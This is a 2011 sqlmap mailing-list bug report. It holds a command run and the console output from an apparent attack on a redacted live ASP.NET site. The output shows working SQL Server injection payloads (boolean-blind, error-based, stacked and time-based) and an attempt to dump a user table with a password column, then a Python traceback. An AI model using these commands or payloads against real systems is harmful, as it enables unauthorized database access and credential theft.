[sqlmap-users] possible bug
Brought to you by:
inquisb
Menu
▾
▴
[sqlmap-users] possible bug
|
From: Vinícius ~ <vin...@gm...> - 2011-05-26 07:40:41
|
./sqlmap.py -u "http://[snip]/Poll.aspx?id=10" -T usuario -C
USUA_NO_USUARIO,USUA_ID_USUARIO,USUA_DE_SENHA --dump
sqlmap/1.0-dev (r3952) - automatic SQL injection and database takeover
tool
http://sqlmap.sourceforge.net
[*] starting at: 19:35:11
[19:35:11] [INFO] using '/home/sqlmap-dev/output/[snip]/session' as session
file
[19:35:11] [INFO] resuming injection data from session file
[19:35:11] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from
session file
[19:35:11] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=10 AND 3888=3888
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING
clause
Payload: id=10 AND
3759=CONVERT(INT,(CHAR(58)+CHAR(108)+CHAR(118)+CHAR(122)+CHAR(58)+(SELECT
(CASE WHEN (3759=3759) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(58)+CHAR(109)+CHAR(106)+CHAR(107)+CHAR(58)))
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=10; WAITFOR DELAY '0:0:5';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=10 WAITFOR DELAY '0:0:5'--
---
[19:35:12] [INFO] for manual usage GET and POST payloads require url
encoding
[19:35:12] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[19:35:12] [WARNING] missing database parameter, sqlmap is going to use the
current database to enumerate table(s) entries
[19:35:12] [INFO] fetching current database
[19:35:12] [INFO] read from file '/home/[snip]/session': [snip]
do you want to use LIKE operator to retrieve column names similar to the
ones provided with the -C option? [Y/n] n
[19:35:14] [INFO] fetching columns 'USUA_NO_USUARIO, USUA_ID_USUARIO,
USUA_DE_SENHA' for table 'dbo.usuario' on database 'Club'
[19:35:15] [INFO] the SQL query used returns 3 entries
[19:35:15] [CRITICAL] connection exception detected. sqlmap will display
partial output'page not found (404)'
[19:35:16] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 1 times, 500 (Internal Server Error) - 3 times
[19:35:16] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r3952), retry
your run with the latest development version from the Subversion repository.
If the exception persists, please send by e-mail to
sql...@li... the following text and any information
required to reproduce the bug. The developers will try to reproduce the bug,
fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r3952)
Python version: 2.6.6
Operating system: posix
Command line: ./sqlmap.py -u
************************************************************ -T usuario -C
********************************************* --dump
Technique: ERROR
Back-end DBMS: Microsoft SQL Server (fingerprinted)
Traceback (most recent call last):
File "./sqlmap.py", line 84, in main
start()
File "/home/sqlmap-dev/lib/controller/controller.py", line 526, in start
action()
File "/home/sqlmap-dev/lib/controller/action.py", line 109, in action
conf.dbmsHandler.dumpTable()
File "/home/sqlmap-dev/plugins/generic/enumeration.py", line 1470, in
dumpTable
self.getColumns(onlyColNames=True)
File "/home/sqlmap-dev/plugins/generic/enumeration.py", line 1081, in
getColumns
if columnData[0] is not None:
TypeError: 'NoneType' object is unsubscriptable
[*] shutting down at: 19:35:1
-
Thanx!
|
